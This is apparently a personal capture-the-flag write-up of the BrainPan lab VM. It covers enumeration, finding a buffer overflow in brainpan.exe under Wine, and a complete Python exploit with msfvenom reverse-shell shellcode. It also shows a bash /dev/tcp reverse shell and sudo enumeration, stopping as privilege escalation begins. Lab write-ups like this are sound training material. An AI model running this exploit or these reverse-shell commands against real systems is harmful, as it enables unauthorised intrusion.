BrainPan

This one was really fun….. a mix of Windows and Linux….. And my first attempt to overflow a Windows binary from a Linux machine.

nmap -sC -sV -oA brainpan.nmap 192.168.1.149
Starting Nmap 7.70 ( https://nmap.org ) at 2019-08-23 15:28 UTC
Nmap scan report for brainpan.lan (192.168.1.149)
Host is up (0.0011s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
9999/tcp open abyss?
| fingerprint-strings:
| NULL:
| _| _|
| _|_|_| _| _|_| _|_|_| _|_|_| _|_|_| _|_|_| _|_|_|
| _|_| _| _| _| _| _| _| _| _| _| _| _|
| _|_|_| _| _|_|_| _| _| _| _|_|_| _|_|_| _| _|
| [________________________ WELCOME TO BRAINPAN _________________________]
|_ ENTER THE PASSWORD
10000/tcp open http SimpleHTTPServer 0.6 (Python 2.7.3)
|_http-title: Site doesn’t have a title (text/html).
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port9999-TCP:V=7.70%I=7%D=8/23%Time=5D600619%P=x86_64-pc-linux-gnu%r(NU
SF:LL,298,”_\|\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20_\|\x20\x20\x20\x20
SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x
SF:20\n_\|_\|_\|\x20\x20\x20\x20_\|\x20\x20_\|_\|\x20\x20\x20\x20_\|_\|_\|
SF:\x20\x20\x20\x20\x20\x20_\|_\|_\|\x20\x20\x20\x20_\|_\|_\|\x20\x20\x20\
SF:x20\x20\x20_\|_\|_\|\x20\x20_\|_\|_\|\x20\x20\n_\|\x20\x20\x20\x20_\|\x
SF:20\x20_\|_\|\x20\x20\x20\x20\x20\x20_\|\x20\x20\x20\x20_\|\x20\x20_\|\x
SF:20\x20_\|\x20\x20\x20\x20_\|\x20\x20_\|\x20\x20\x20\x20_\|\x20\x20_\|\x
SF:20\x20\x20\x20_\|\x20\x20_\|\x20\x20\x20\x20_\|\n_\|\x20\x20\x20\x20_\|
SF:\x20\x20_\|\x20\x20\x20\x20\x20\x20\x20\x20_\|\x20\x20\x20\x20_\|\x20\x
SF:20_\|\x20\x20_\|\x20\x20\x20\x20_\|\x20\x20_\|\x20\x20\x20\x20_\|\x20\x
SF:20_\|\x20\x20\x20\x20_\|\x20\x20_\|\x20\x20\x20\x20_\|\n_\|_\|_\|\x20\x
SF:20\x20\x20_\|\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20_\|_\|_\|\x20\x20_
SF:\|\x20\x20_\|\x20\x20\x20\x20_\|\x20\x20_\|_\|_\|\x20\x20\x20\x20\x20\x
SF:20_\|_\|_\|\x20\x20_\|\x20\x20\x20\x20_\|\n\x20\x20\x20\x20\x20\x20\x20
SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20_\|\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\n\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20_\|\n\n\[________________________\x20WELCOME\x20TO\x20BRAINPAN\x
SF:20_________________________\]\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20ENTER\x
SF:20THE\x20PASSWORD\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\n\n\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:\x20\x20\x20\x20\x20\x20\x20\x20>>\x20″);
MAC Address: 94:65:9C:41:A0:D7 (Intel Corporate)

On port 10000 I see a website:

file:///tmp/tmphBGARS/1.png
file:///tmp/tmphBGARS/1.png

Trying to enumerate the website with dirbuster….

dirbuster -l /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt http://192.168.1.149 >brainpan.dirb

In the meantime, I started a netcat against port 9999:

root@kali:~/boxes/brainpan# nc 192.168.1.149 9999
_| _|
_|_|_| _| _|_| _|_|_| _|_|_| _|_|_| _|_|_| _|_|_|
_| _| _|_| _| _| _| _| _| _| _| _| _| _| _|
_| _| _| _| _| _| _| _| _| _| _| _| _| _|
_|_|_| _| _|_|_| _| _| _| _|_|_| _|_|_| _| _|
_|
_|

[________________________ WELCOME TO BRAINPAN _________________________]
ENTER THE PASSWORD

>> test
ACCESS DENIED
root@kali:~/boxes/brainpan#

Dirbuster found a /bin directory:

file:///tmp/tmphBGARS/2.png

I downloaded the file and now trying to see what it is:

file brainpan.exe
brainpan.exe: PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows

OK so we have a win32 binary…

Did a cat on it and found this:

[get_reply] copied %d bytes to buffer
shitstorm

_| _|
_|_|_| _| _|_| _|_|_| _|_|_| _|_|_| _|_|_| _|_|_|
_| _| _|_| _| _| _| _| _| _| _| _| _| _| _|
_| _| _| _| _| _| _| _| _| _| _| _| _| _|
_|_|_| _| _|_|_| _| _| _| _|_|_| _|_|_| _| _|
_|
_|

[________________________ WELCOME TO BRAINPAN _________________________]
ENTER THE PASSWORD

>> ACCESS DENIED
ACCESS GRANTED

So tried it on the website: Nothing.. Cannot get it to pass the login.
Maybe with netcat:

file:///tmp/tmphBGARS/3.png

So I can login but then nothing.

I tried to add an argument when calling the target, and I have an odd message:

root@kali:~# netcat 192.168.1.149 9999 $(python -c “print ‘shitstorm'”)
_| _|
_|_|_| _| _|_| _|_|_| _|_|_| _|_|_| _|_|_| _|_|_|
_| _| _|_| _| _| _| _| _| _| _| _| _| _| _|
_| _| _| _| _| _| _| _| _| _| _| _| _| _|
_|_|_| _| _|_|_| _| _| _| _|_|_| _|_|_| _| _|
_|
_|

[________________________ WELCOME TO BRAINPAN _________________________]
ENTER THE PASSWORD

>> shitstorm
ACCESS GRANTEDinvalid port shitstorm

Interesting… So maybe I can open a new port:

netcat 192.168.1.149 9999 80
_| _|
_|_|_| _| _|_| _|_|_| _|_|_| _|_|_| _|_|_| _|_|_|
_| _| _|_| _| _| _| _| _| _| _| _| _| _| _|
_| _| _| _| _| _| _| _| _| _| _| _| _| _|
_|_|_| _| _|_|_| _| _| _| _|_|_| _|_|_| _| _|
_|
_|

[________________________ WELCOME TO BRAINPAN _________________________]
ENTER THE PASSWORD

>> shitstorm
ACCESS GRANTEDroot@kali:~#

But then when I try to open a webpage on port 80, no response.
Maybe it openned something different.. Let’s nmap it:

nc -v 192.168.1.149 80
brainpan.lan [192.168.1.149] 80 (http) : Connection refused

So I don’t have an error message but no new connection is detected.

I tried port 21.. same thing. No error but nothing happens.

So let’s try all of them:

In list.txt, I have the password: shitstorm

Then I created knock.sh:

#!/bin/bash

i=”0″
while [ $i -lt 65535 ]
do
echo $i
nc 192.168.1.149 9999 < list.txt $i
i=$[$i+1]
done

Executed it and re run nmap:

Didn’t do anything!!!!

So I tried to diassemble it using radare2:

Found this:
section..rdata ; [02] -r– section size 4096 named .rdata

Maybe it can be overflowed…

Nope…

But I also saw this:

str.ACCESS_GRANTED
0x31173319 2020 2020 2020 2020 2020 2020 2020 20
0x31173328 2020 2020 2020 4143 4345 5353 2047 52 ACCESS GR
0x31173337 414e 5445 440a 005b 2b5d 2069 6e69 74 ANTED..[+] init ; str.initializing_winsock…
0x31173346 6961 6c69 7a69 6e67 2077 696e 736f 63 ializing winsoc
0x31173355 6b2e 2e2e 005b 215d 2077 696e 736f 63 k….[!] winsoc ; str.winsock_init_failed:__d
0x31173364 6b20 696e 6974 2066 6169 6c65 643a 20 k init failed:
0x31173373 2564 0064 6f6e 652e 0a00 0000 005b 21 %d.done……[! ; str.done. ; str.could_not_create_socket:__d
0x31173382 5d20 636f 756c 6420 6e6f 7420 6372 65 ] could not cre
0x31173391 6174 6520 736f 636b 6574 3a20 2564 00 ate socket: %d.

0x311733a0 5b2b 5d20 7365 7276 6572 2073 6f63 6b [+] server sock ; str.server_socket_created.

0x311733af 6574 2063 7265 6174 6564 2e0a 005b 21 et created…[! ; str.bind_failed:__d
0x311733be 5d20 6269 6e64 2066 6169 6c65 643a 20 ] bind failed:
0x311733cd 2564 005b 2b5d 2062 696e 6420 646f 6e %d.[+] bind don ; str.bind_done_on_port__d
0x311733dc 6520 6f6e 2070 6f72 7420 2564 0a00 5b e on port %d..[ ; str.waiting_for_connections.
0x311733eb 2b5d 2077 6169 7469 6e67 2066 6f72 20 +] waiting for
0x311733fa 636f 6e6e 6563 7469 6f6e 732e 0a00 5b connections…[ ; str.received_connection.
0x31173409 2b5d 2072 6563 6569 7665 6420 636f 6e +] received con
0x31173418 6e65 6374 696f 6e2e 0a00 5b2b 5d20 63 nection…[+] c ; str.check_is__d
0x31173427 6865 636b 2069 7320 2564 0a00 5b21 5d heck is %d..[!] ; str.accept_failed:__d
0x31173436 2061 6363 6570 7420 6661 696c 6564 3a accept failed:
0x31173445 2025 6400 5b2b 5d20 636c 6561 6e69 6e %d.[+] cleanin ; str.cleaning_up.
0x31173454 6720 7570 2e0a 0000 0000 0000 2d4c 49 g up……..-LI ; str.LIBGCCW32_EH_3_SJLJ_GTHR_MINGW32
0x31173463 4247 4343 5733 322d 4548 2d33 2d53 4a BGCCW32-EH-3-SJ
0x31173472 4c4a 2d47 5448 522d 4d49 4e47 5733 32 LJ-GTHR-MINGW32
0x31173481 0000 0077 3332 5f73 6861 7265 6470 74 …w32_sharedpt ; str.w32_sharedptr__size____sizeof_W32_EH_SHARED

So my first idea should have worked… Weird

/Trying differently:

Running brainpan.exe using wine:

wine brainpan.exe
[+] initializing winsock…done.
[+] server socket created.
[+] bind done on port 9999
[+] waiting for connections.

Then pushing a file with 3000 “A”:

nc 192.168.1.123 9999 < overflow
_| _|
_|_|_| _| _|_| _|_|_| _|_|_| _|_|_| _|_|_| _|_|_|
_| _| _|_| _| _| _| _| _| _| _| _| _| _| _|
_| _| _| _| _| _| _| _| _| _| _| _| _| _|
_|_|_| _| _|_|_| _| _| _| _|_|_| _|_|_| _| _|
_|
_|

[________________________ WELCOME TO BRAINPAN _________________________]
ENTER THE PASSWORD

[+] received connection.
[get_reply] s = [AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAx■C]
[get_reply] copied 1003 bytes to buffer
wine: Unhandled page fault on read access to 0x41414141 at address 0x41414141 (thread 0009), starting debugger…
0009:err:seh:start_debugger Couldn’t start debugger (“winedbg –auto 8 48”) (2)
Read the Wine Developers Guide on how to set up winedbg or another debugger

CRASH… We can overflow it!

So I ran it with winedbg:

Unhandled exception: page fault on read access to 0x41414141 in 32-bit code (0x41414141).
Register dump:
CS:0023 SS:002b DS:002b ES:002b FS:006b GS:0063
EIP:41414141 ESP:0043f860 EBP:41414141 EFLAGS:00010202( R- — I – – – )
EAX:ffffffff EBX:7b63ee08 ECX:0043f640 EDX:0043f650
ESI:7b63ee08 EDI:00000000
Stack dump:
0x0043f860: 41414141 41414141 41414141 41414141
0x0043f870: 41414141 41414141 41414141 41414141
0x0043f880: 41414141 41414141 41414141 41414141
0x0043f890: 41414141 41414141 41414141 41414141
0x0043f8a0: 41414141 41414141 41414141 41414141
0x0043f8b0: 41414141 41414141 41414141 41414141

We overwrote EIP. So let’s find where it breaks:

First we create a unique pattern:

msf-pattern_create -l 1200
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9

Then inject it:

It crashes again:

Unhandled exception: page fault on read access to 0x35724134 in 32-bit code (0x35724134).
Register dump:
CS:0023 SS:002b DS:002b ES:002b FS:006b GS:0063
EIP:35724134 ESP:0042f860 EBP:72413372 EFLAGS:00010202( R- — I – – – )
EAX:ffffffff EBX:7b63ee08 ECX:0042f640 EDX:0042f650
ESI:7b63ee08 EDI:00000000
Stack dump:
0x0042f860: 41367241 72413772 39724138 41307341
0x0042f870: 73413173 33734132 41347341 73413573
0x0042f880: 37734136 41387341 74413973 31744130
0x0042f890: 41327441 74413374 35744134 41367441
0x0042f8a0: 74413774 39744138 41307541 75413175
0x0042f8b0: 33754132 41347541 75413575 37754136
Backtrace:
=>0 0x35724134 (0x72413372)
0x35724134: — no code accessible —
Modules:
Module Address Debug info Name (5 modules)
PE 31170000-31176000 Deferred brainpan
PE 7b420000-7b5d1000 Deferred kernel32
PE 7bc10000-7bc14000 Deferred ntdll
PE 7faf0000-7faf4000 Deferred ws2_32
PE 7fb30000-7fb34000 Deferred msvcrt

Now finding the offset:

msf-pattern_offset -q 35724134
[*] Exact match at offset 524

We have our payload length!

Let’s start working on the exploit:

import struct
pad = “\x41” *524
EIP = struct.pack(“I”,0xffffdd34)
shellcode = “\x31\xc0\x31\xdb\xb0\x06\xcd\x80\x53\x68/tty\x68/dev\x89\xe3\x31\xc9\x66\xb9\x12\x27\xb0\x05\xcd\x80\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80”
NOP = “\x90” * 1000
print pad + EIP + NOP + shellcode

Found the JMP ESP with Ollydbg:

file:///tmp/tmphBGARS/4.png

311712F3

#!/usr/bin/python
import socket
import struct
server = ‘192.168.1.149’
sport = 9999

pad = “\x41” *524
EIP = struct.pack(“I”,0x311712F3)
shellcode = “\x31\xc0\x31\xdb\xb0\x06\xcd\x80\x53\x68/tty\x68/dev\x89\xe3\x31\xc9\x66\xb9\x12\x27\xb0\x05\xcd\x80\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80”
NOP = “\x90” * 1000
exploit = pad + EIP + NOP + shellcode

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect = s.connect((server, sport))
print s.recv(1024)
print “Sending attack ”
s.send((‘shitstorm .’ + exploit + ‘\r\n’))
print s.recv(1024)
s.close()

Now generating the real paylod:

msfvenom -p windows/shell_reverse_tcp LPORT=4444 LHOST=192.168.1.123 -b “\x00” -e x86/shikata_ga_nai -f c
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 351 (iteration=0)
x86/shikata_ga_nai chosen with final size 351
Payload size: 351 bytes
Final size of c file: 1500 bytes
unsigned char buf[] =
“\xda\xdf\xd9\x74\x24\xf4\xbb\xb9\xcc\xed\x34\x5d\x29\xc9\xb1”
“\x52\x31\x5d\x17\x03\x5d\x17\x83\x7c\xc8\x0f\xc1\x82\x39\x4d”
“\x2a\x7a\xba\x32\xa2\x9f\x8b\x72\xd0\xd4\xbc\x42\x92\xb8\x30”
“\x28\xf6\x28\xc2\x5c\xdf\x5f\x63\xea\x39\x6e\x74\x47\x79\xf1”
“\xf6\x9a\xae\xd1\xc7\x54\xa3\x10\x0f\x88\x4e\x40\xd8\xc6\xfd”
“\x74\x6d\x92\x3d\xff\x3d\x32\x46\x1c\xf5\x35\x67\xb3\x8d\x6f”
“\xa7\x32\x41\x04\xee\x2c\x86\x21\xb8\xc7\x7c\xdd\x3b\x01\x4d”
“\x1e\x97\x6c\x61\xed\xe9\xa9\x46\x0e\x9c\xc3\xb4\xb3\xa7\x10”
“\xc6\x6f\x2d\x82\x60\xfb\x95\x6e\x90\x28\x43\xe5\x9e\x85\x07”
“\xa1\x82\x18\xcb\xda\xbf\x91\xea\x0c\x36\xe1\xc8\x88\x12\xb1”
“\x71\x89\xfe\x14\x8d\xc9\xa0\xc9\x2b\x82\x4d\x1d\x46\xc9\x19”
“\xd2\x6b\xf1\xd9\x7c\xfb\x82\xeb\x23\x57\x0c\x40\xab\x71\xcb”
“\xa7\x86\xc6\x43\x56\x29\x37\x4a\x9d\x7d\x67\xe4\x34\xfe\xec”
“\xf4\xb9\x2b\xa2\xa4\x15\x84\x03\x14\xd6\x74\xec\x7e\xd9\xab”
“\x0c\x81\x33\xc4\xa7\x78\xd4\x2b\x9f\x83\x5f\xc4\xe2\x83\x8e”
“\x48\x6a\x65\xda\x60\x3a\x3e\x73\x18\x67\xb4\xe2\xe5\xbd\xb1”
“\x25\x6d\x32\x46\xeb\x86\x3f\x54\x9c\x66\x0a\x06\x0b\x78\xa0”
“\x2e\xd7\xeb\x2f\xae\x9e\x17\xf8\xf9\xf7\xe6\xf1\x6f\xea\x51”
“\xa8\x8d\xf7\x04\x93\x15\x2c\xf5\x1a\x94\xa1\x41\x39\x86\x7f”
“\x49\x05\xf2\x2f\x1c\xd3\xac\x89\xf6\x95\x06\x40\xa4\x7f\xce”
“\x15\x86\xbf\x88\x19\xc3\x49\x74\xab\xba\x0f\x8b\x04\x2b\x98”
“\xf4\x78\xcb\x67\x2f\x39\xfb\x2d\x6d\x68\x94\xeb\xe4\x28\xf9”
“\x0b\xd3\x6f\x04\x88\xd1\x0f\xf3\x90\x90\x0a\xbf\x16\x49\x67”
“\xd0\xf2\x6d\xd4\xd1\xd6”;

Code is now:

#!/usr/bin/python
import socket
server = ‘192.168.1.149’
##server = ‘192.168.1.123’
sport = 9999

pad = “\x41” *524
EIP = “\xf3\x12\x17\x31”
shellcode = (“\xda\xdf\xd9\x74\x24\xf4\xbb\xb9\xcc\xed\x34\x5d\x29\xc9\xb1”
“\x52\x31\x5d\x17\x03\x5d\x17\x83\x7c\xc8\x0f\xc1\x82\x39\x4d”
“\x2a\x7a\xba\x32\xa2\x9f\x8b\x72\xd0\xd4\xbc\x42\x92\xb8\x30”
“\x28\xf6\x28\xc2\x5c\xdf\x5f\x63\xea\x39\x6e\x74\x47\x79\xf1”
“\xf6\x9a\xae\xd1\xc7\x54\xa3\x10\x0f\x88\x4e\x40\xd8\xc6\xfd”
“\x74\x6d\x92\x3d\xff\x3d\x32\x46\x1c\xf5\x35\x67\xb3\x8d\x6f”
“\xa7\x32\x41\x04\xee\x2c\x86\x21\xb8\xc7\x7c\xdd\x3b\x01\x4d”
“\x1e\x97\x6c\x61\xed\xe9\xa9\x46\x0e\x9c\xc3\xb4\xb3\xa7\x10”
“\xc6\x6f\x2d\x82\x60\xfb\x95\x6e\x90\x28\x43\xe5\x9e\x85\x07”
“\xa1\x82\x18\xcb\xda\xbf\x91\xea\x0c\x36\xe1\xc8\x88\x12\xb1”
“\x71\x89\xfe\x14\x8d\xc9\xa0\xc9\x2b\x82\x4d\x1d\x46\xc9\x19”
“\xd2\x6b\xf1\xd9\x7c\xfb\x82\xeb\x23\x57\x0c\x40\xab\x71\xcb”
“\xa7\x86\xc6\x43\x56\x29\x37\x4a\x9d\x7d\x67\xe4\x34\xfe\xec”
“\xf4\xb9\x2b\xa2\xa4\x15\x84\x03\x14\xd6\x74\xec\x7e\xd9\xab”
“\x0c\x81\x33\xc4\xa7\x78\xd4\x2b\x9f\x83\x5f\xc4\xe2\x83\x8e”
“\x48\x6a\x65\xda\x60\x3a\x3e\x73\x18\x67\xb4\xe2\xe5\xbd\xb1”
“\x25\x6d\x32\x46\xeb\x86\x3f\x54\x9c\x66\x0a\x06\x0b\x78\xa0”
“\x2e\xd7\xeb\x2f\xae\x9e\x17\xf8\xf9\xf7\xe6\xf1\x6f\xea\x51”
“\xa8\x8d\xf7\x04\x93\x15\x2c\xf5\x1a\x94\xa1\x41\x39\x86\x7f”
“\x49\x05\xf2\x2f\x1c\xd3\xac\x89\xf6\x95\x06\x40\xa4\x7f\xce”
“\x15\x86\xbf\x88\x19\xc3\x49\x74\xab\xba\x0f\x8b\x04\x2b\x98”
“\xf4\x78\xcb\x67\x2f\x39\xfb\x2d\x6d\x68\x94\xeb\xe4\x28\xf9”
“\x0b\xd3\x6f\x04\x88\xd1\x0f\xf3\x90\x90\x0a\xbf\x16\x49\x67”
“\xd0\xf2\x6d\xd4\xd1\xd6”)
NOP = “\x90” * 16
exploit = pad + EIP + NOP + shellcode

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect = s.connect((server, sport))
s.recv(1024)
s.send(exploit)
s.close()

Setting a listenner on port 443:

nc -nvlp 4444

Then ran my exploit:

nc -lvnp 4444
listening on [any] 4444 …
connect to [192.168.1.123] from (UNKNOWN) [192.168.1.149] 34588
CMD Version 1.4.1

Z:\home\puck>whoami
File not found.

Z:\home\puck>dir
Volume in drive Z has no label.
Volume Serial Number is 0000-0000

Directory of Z:\home\puck

3/6/2013 3:23 PM <DIR> .
3/4/2013 11:49 AM <DIR> ..
3/6/2013 3:23 PM 513 checksrv.sh
3/4/2013 2:45 PM <DIR> web
1 file 513 bytes
3 directories 13,846,552,576 bytes free

ESCALATION:

Z:\home\puck>type checksrv.sh
#!/bin/bash
# run brainpan.exe if it stops
lsof -i:9999
if [[ $? -eq 1 ]]; then
pid=`ps aux | grep brainpan.exe | grep -v grep`
if [[ ! -z $pid ]]; then
kill -9 $pid
killall wineserver
killall winedevice.exe
fi
/usr/bin/wine /home/puck/web/bin/brainpan.exe &
fi

# run SimpleHTTPServer if it stops
lsof -i:10000
if [[ $? -eq 1 ]]; then
pid=`ps aux | grep SimpleHTTPServer | grep -v grep`
if [[ ! -z $pid ]]; then
kill -9 $pid
fi
cd /home/puck/web
/usr/bin/python -m SimpleHTTPServer 10000
fi

Nothing really interesting there.

This machine is strange… Almost all folders are empty..
Trying to detect windows version:

ver

CMD Version 1.4.1

Even more strange:

Z:\home\puck>cd ..

Z:\home>cd ..

Z:\>dir /a
Volume in drive Z has no label.
Volume Serial Number is 0000-0000

Directory of Z:\

3/4/2013 1:02 PM <DIR> bin
3/4/2013 11:19 AM <DIR> boot
8/28/2019 8:03 PM <DIR> etc
3/4/2013 11:49 AM <DIR> home
3/4/2013 11:18 AM 15,084,717 initrd.img
3/4/2013 11:18 AM 15,084,717 initrd.img.old
3/4/2013 1:04 PM <DIR> lib
3/4/2013 10:12 AM <DIR> lost+found
3/4/2013 10:12 AM <DIR> media
10/9/2012 9:59 AM <DIR> mnt
3/4/2013 10:13 AM <DIR> opt
3/7/2013 11:07 PM <DIR> root
8/28/2019 8:03 PM <DIR> run
3/4/2013 11:20 AM <DIR> sbin
6/11/2012 9:43 AM <DIR> selinux
3/4/2013 10:13 AM <DIR> srv
8/28/2019 8:04 PM <DIR> tmp
3/4/2013 10:13 AM <DIR> usr
8/28/2019 8:03 PM <DIR> var
2/25/2013 2:32 PM 5,180,432 vmlinuz
2/25/2013 2:32 PM 5,180,432 vmlinuz.old
4 files 40,530,298 bytes
17 directories 13,846,274,048 bytes free

So I am on a linux box….

Went to Z:/bin

And executed bash… it worked!

So on the target I ran:
bash -i >& /dev/tcp/192.168.1.123/6666 0>&1

And on kali:

nc -lnvp 6666

And I have now a bash shell…

nc -nvlp 6666
listening on [any] 6666 …
connect to [192.168.1.123] from (UNKNOWN) [192.168.1.149] 35588
bash: no job control in this shell

A little bit of cleaning:

puck@brainpan:/bin$ python -c ‘import pty; pty.spawn(“/bin/bash”)’
python -c ‘import pty; pty.spawn(“/bin/bash”)’

Now let’s digg:

sudo -l
Matching Defaults entries for puck on this host:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User puck may run the following commands on this host:
(root) NOPASSWD: /home/anansi/bin/anansi_util

For now it seems that I can only execute the file..

So let’s run linenum:

DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=12.10
DISTRIB_CODENAME=quantal
DISTRIB_DESCRIPTION=”Ubuntu 12.10″
NAME=”Ubuntu”
VERSION=”12.10, Quantal Quetzal”
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME=”Ubuntu quantal (12.10)”
VERSION_ID=”12.10″

We can sudo without supplying a password!
Matching Defaults entries for puck on this host:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User puck may run the following commands on this host:
(root) NOPASSWD: /home/anansi/bin/anansi_util

### INTERESTING FILES ####################################
[-] Useful file locations:
/bin/nc
/bin/netcat
/usr/bin/wget

Checking exploitdb for Ubuntu 12.10
The only one available is for 64 bits platforms.. and here we have a 32 bits.

OK so let’s focus on that exe from anansi:

sudo /home/anansi/bin/anansi_util $(python -c “print ‘B’*3000”)
<ome/anansi/bin/anansi_util $(python -c “print ‘B’*3000”)
‘unknown’: unknown terminal type.
